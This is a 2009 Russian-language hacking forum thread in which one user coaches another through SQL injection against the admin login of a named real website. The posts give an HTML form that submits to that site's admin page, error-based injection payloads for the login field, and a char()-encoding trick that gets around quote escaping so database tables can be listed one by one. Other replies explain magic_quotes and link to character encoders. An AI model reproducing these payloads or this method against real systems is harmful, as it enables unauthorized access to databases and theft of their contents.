23.01.2009, 18:16
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
2 BloodyMessage and kevmen
Уточняю, в большинстве подобных случаев никто никого не фильтрует...
Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
Доходчиво объяснил?
|
|
|
23.01.2009, 18:19
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Gemini12, сделай такой скриптик:
Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>
и вбивай в поле "Логин":
' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--
Дальше разберёшься?
|
|
|
|
23.01.2009, 18:28
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от groundhog
Gemini12, сделай такой скриптик:
Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>
и вбивай в поле "Логин":
' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--
Дальше разберёшься?
Чето не совсем понял куда этот скрипт девать 
Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...
|
|
|
|
23.01.2009, 18:27
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)
Gemini12,какая таблица значений еще?? 
кодировщик-декодировщик
http://paulschou.com/tools/xlate/
ищи тут
Последний раз редактировалось kevmen; 23.01.2009 в 18:30..
|
|
|
|
23.01.2009, 18:28
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Gemini12
закодировать в чар можно здесь
http://www.webfuture.ru/igo/convert.php
|
|
|
|
23.01.2009, 18:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
|
|
|
|
23.01.2009, 19:02
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от groundhog
Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
А что зашифровал?
|
|
|
|
23.01.2009, 18:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...
|
|
|
|
23.01.2009, 18:57
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Все! Понял! Благодарю!
|
|
|
|
23.01.2009, 19:05
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
